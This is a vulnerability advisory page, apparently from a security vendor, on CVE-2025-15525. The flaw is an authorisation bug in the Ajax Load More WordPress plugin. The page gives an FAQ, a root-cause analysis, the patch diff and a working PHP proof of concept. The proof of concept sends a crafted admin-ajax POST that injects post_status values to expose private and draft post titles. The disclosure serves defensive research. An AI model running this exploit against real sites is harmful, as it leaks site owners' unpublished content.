What is CVE-2025-15525?

CVE-2025-15525 is a medium-severity vulnerability in the Ajax Load More WordPress plugin, allowing unauthorized access to the titles and excerpts of private, draft, pending, scheduled, and trashed posts. This occurs due to incorrect authorization in the parse_custom_args() function, which fails to properly filter sensitive query parameters.

How does this vulnerability work?

The vulnerability allows unauthenticated attackers to craft requests to the plugin’s AJAX endpoint with manipulated custom_args parameters. By injecting post_status values, attackers can bypass WordPress’s access controls and retrieve sensitive post metadata that should remain private.

Who is affected by this vulnerability?

Any WordPress site using Ajax Load More plugin version 7.8.1 or earlier is affected. Site administrators should check their plugin version in the WordPress dashboard and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Ajax Load More plugin installed. If it is version 7.8.1 or earlier, your site is at risk. You can also review the plugin’s changelog for updates regarding this vulnerability.

How can I fix this vulnerability?

The vulnerability is patched in version 7.8.2 of the Ajax Load More plugin. To mitigate the issue, update the plugin to the latest version available in the WordPress plugin repository.

What if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Ajax Load More plugin temporarily to prevent exploitation. Additionally, review your site’s security settings and monitor for unusual activity.

What does a CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability does not allow full system compromise, it poses a risk of information disclosure which could be exploited for further attacks or social engineering.

What kind of information can be exposed?

The vulnerability can expose the titles and excerpts of posts with private, draft, pending, scheduled, or trashed statuses. This information may include sensitive content, internal plans, or unpublished articles, which could lead to confidentiality breaches.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can send a crafted POST request to the AJAX endpoint with a custom_args parameter that includes unauthorized post statuses. This request allows the attacker to retrieve data that should be protected, effectively demonstrating the vulnerability.

What are the implications of this vulnerability?

The implications include unauthorized access to sensitive content, which can lead to data leaks and potential reputational damage. Organizations using WordPress for internal communications or content staging should take this vulnerability seriously.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-15525: Ajax Load More – Infinite Scroll, Lazy Load & Load More <= 7.8.1 – Incorrect Authorization to Unauthenticated Private/Draft Post Title and Excerpt Exposure (ajax-load-more)

CVE ID CVE-2025-15525

Plugin ajax-load-more

Severity Medium (CVSS 5.3)

CWE 863

Vulnerable Version 7.8.1

Patched Version 7.8.2

Disclosed January 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15525:
This vulnerability is an incorrect authorization flaw in the Ajax Load More WordPress plugin. The flaw allows unauthenticated attackers to bypass WordPress’s standard post status controls. Attackers can retrieve titles and excerpts from posts with private, draft, pending, scheduled, or trashed statuses. The CVSS score of 5.3 reflects a medium-severity information disclosure issue.

The root cause is the `parse_custom_args()` function in `/ajax-load-more/core/classes/class-alm-queryargs.php`. This function processes user-supplied `custom_args` parameters to modify WordPress query arguments. The vulnerable version (lines 498-521) accepts and processes any parameter key provided via the `custom_args` string. Crucially, it does not filter out sensitive WordPress query parameters like `post_status`. An attacker can inject `post_status` via the `custom_args` parameter to override the plugin’s default query constraints.

Exploitation occurs via the plugin’s AJAX endpoint. The plugin registers an AJAX action, typically `alm_get_posts`, accessible to unauthenticated users at `/wp-admin/admin-ajax.php`. An attacker crafts a POST request with an `action` parameter set to `alm_get_posts`. They include a `custom_args` parameter with a value like `post_status:any,private,draft`. This string is split and processed by `parse_custom_args()`, which unsafely adds `post_status` => `[‘any’,’private’,’draft’]` to the query arguments. The subsequent `WP_Query` uses this attacker-controlled status list, returning posts that should be inaccessible.

The patch adds an authorization check at the parameter level. In the patched version (lines 497-527), the function defines an `$exlude_keys` array containing sensitive query parameters: `[‘post_status’, ‘perm’, ‘post_password’, ‘post__in’, ‘meta_query’, ‘tax_query’, ‘date_query’, ‘alm_vars’]`. During the parsing loop, the code checks if the provided key (`$arg[0]`) exists in this exclusion list using `in_array()`. If a match is found, the `continue` statement skips processing for that key, preventing its injection into the final `$args` array. This change ensures user input cannot override core query security parameters.

The impact is unauthorized disclosure of sensitive post metadata. While the vulnerability does not expose full post content, titles and excerpts often contain confidential information. Attackers can map internal content, discover unpublished plans, or gather intelligence for social engineering. This data exposure violates the confidentiality of draft and private content, potentially impacting organizations that use WordPress for internal communications or content staging.

Differential between vulnerable and patched code

Code Diff

--- a/ajax-load-more/ajax-load-more.php
+++ b/ajax-load-more/ajax-load-more.php
@@ -7,15 +7,15 @@
  * Author: Darren Cooney
  * Twitter: @KaptonKaos
  * Author URI: https://connekthq.com
- * Version: 7.8.1
+ * Version: 7.8.2
  * License: GPL
  * Copyright: Darren Cooney & Connekt Media
  *
  * @package AjaxLoadMore
  */

-define( 'ALM_VERSION', '7.8.1' );
-define( 'ALM_RELEASE', 'January 9, 2026' );
+define( 'ALM_VERSION', '7.8.2' );
+define( 'ALM_RELEASE', 'January 28, 2026' );
 define( 'ALM_STORE_URL', 'https://connekthq.com' );

 require_once plugin_dir_path( __FILE__ ) . 'core/functions/install.php';
--- a/ajax-load-more/core/classes/class-alm-queryargs.php
+++ b/ajax-load-more/core/classes/class-alm-queryargs.php
@@ -489,7 +489,6 @@
 			return $args;
 		}

-
 		/**
 		 * Parse `custom_args` string parameter into array.
 		 *
@@ -498,21 +497,27 @@
 		 * @return array         The modified arguments.
 		 */
 		public static function parse_custom_args( $args, $param ) {
-			$array = explode( ';', $param ); // Split the $param at `;`.
+			$array = explode( ';', $param );
+
+			// Exclude certain keys from being added via custom_args.
+			$exlude_keys = [ 'post_status', 'perm', 'post_password', 'post__in', 'meta_query', 'tax_query', 'date_query', 'alm_vars' ];

 			// Loop each $argument.
 			foreach ( $array as $arg ) {
-				$arg     = preg_replace( '/s+/', '', $arg ); // Remove all whitespace.
-				$arg     = explode( ':', $arg );  // Split at each colon.
-				$arg_arr = explode( ',', $arg[1] );  // Split at each comma.
-				if ( count( $arg_arr ) > 1 ) {
-					$args[ $arg[0] ] = $arg_arr;
+				$arg   = explode( ':', preg_replace( '/s+/', '', $arg ) );  // Split at each colon & remove whitespace.
+				$value = explode( ',', $arg[1] );  // Split at each comma.
+
+				if ( in_array( $arg[0], $exlude_keys, true ) ) {
+					continue; // Skip excluded keys.
+				}
+
+				if ( count( $value ) > 1 ) {
+					$args[ $arg[0] ] = $value;
 				} else {
 					$args[ $arg[0] ] = $arg[1];
 				}
 			}

-			// Return parsed $args.
 			return $args;
 		}
 	}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15525 - Ajax Load More <= 7.8.1 - Incorrect Authorization to Unauthenticated Private/Draft Post Title and Excerpt Exposure

<?php
// Configure the target WordPress site URL
$target_url = 'http://vulnerable-wordpress-site.com';

// Construct the AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Prepare the malicious payload.
// The 'custom_args' parameter injects the 'post_status' key with values that bypass default restrictions.
$post_data = [
    'action' => 'alm_get_posts',           // The plugin's AJAX action hook
    'custom_args' => 'post_status:any,private,draft,pending,future,trash', // Override query status
    'query_type' => 'standard',            // Standard query type
    'posts_per_page' => '5',               // Limit results for testing
    'nonce' => ''                          // Nonce is often not required for this action
];

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing environments
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output the results
echo "Target: $target_urln";
echo "HTTP Status: $http_coden";
if ($response) {
    $data = json_decode($response, true);
    if (json_last_error() === JSON_ERROR_NONE && isset($data['html'])) {
        echo "n[SUCCESS] Potential data leakage detected.n";
        echo "Response contains HTML data block.n";
        // The 'html' field contains the rendered post titles/excerpts.
        // For a cleaner demo, you could parse the HTML for post titles.
        echo "Sample output length: " . strlen($data['html']) . " characters.n";
    } else {
        echo "n[INFO] Raw response:n$responsen";
    }
} else {
    echo "n[ERROR] No response received.n";
}
?>

Frequently Asked Questions

What is CVE-2025-15525?
Overview of the vulnerability
CVE-2025-15525 is a medium-severity vulnerability in the Ajax Load More WordPress plugin, allowing unauthorized access to the titles and excerpts of private, draft, pending, scheduled, and trashed posts. This occurs due to incorrect authorization in the parse_custom_args() function, which fails to properly filter sensitive query parameters.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows unauthenticated attackers to craft requests to the plugin’s AJAX endpoint with manipulated custom_args parameters. By injecting post_status values, attackers can bypass WordPress’s access controls and retrieve sensitive post metadata that should remain private.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using Ajax Load More plugin version 7.8.1 or earlier is affected. Site administrators should check their plugin version in the WordPress dashboard and update if necessary.
How can I check if my site is vulnerable?
Steps for site administrators
To check if your site is vulnerable, verify the version of the Ajax Load More plugin installed. If it is version 7.8.1 or earlier, your site is at risk. You can also review the plugin’s changelog for updates regarding this vulnerability.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 7.8.2 of the Ajax Load More plugin. To mitigate the issue, update the plugin to the latest version available in the WordPress plugin repository.
What if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the Ajax Load More plugin temporarily to prevent exploitation. Additionally, review your site’s security settings and monitor for unusual activity.
What does a CVSS score of 5.3 mean?
Understanding vulnerability severity
A CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability does not allow full system compromise, it poses a risk of information disclosure which could be exploited for further attacks or social engineering.
What kind of information can be exposed?
Potential data leakage
The vulnerability can expose the titles and excerpts of posts with private, draft, pending, scheduled, or trashed statuses. This information may include sensitive content, internal plans, or unpublished articles, which could lead to confidentiality breaches.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept shows how an attacker can send a crafted POST request to the AJAX endpoint with a custom_args parameter that includes unauthorized post statuses. This request allows the attacker to retrieve data that should be protected, effectively demonstrating the vulnerability.
What are the implications of this vulnerability?
Risks to organizations
The implications include unauthorized access to sensitive content, which can lead to data leaks and potential reputational damage. Organizations using WordPress for internal communications or content staging should take this vulnerability seriously.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations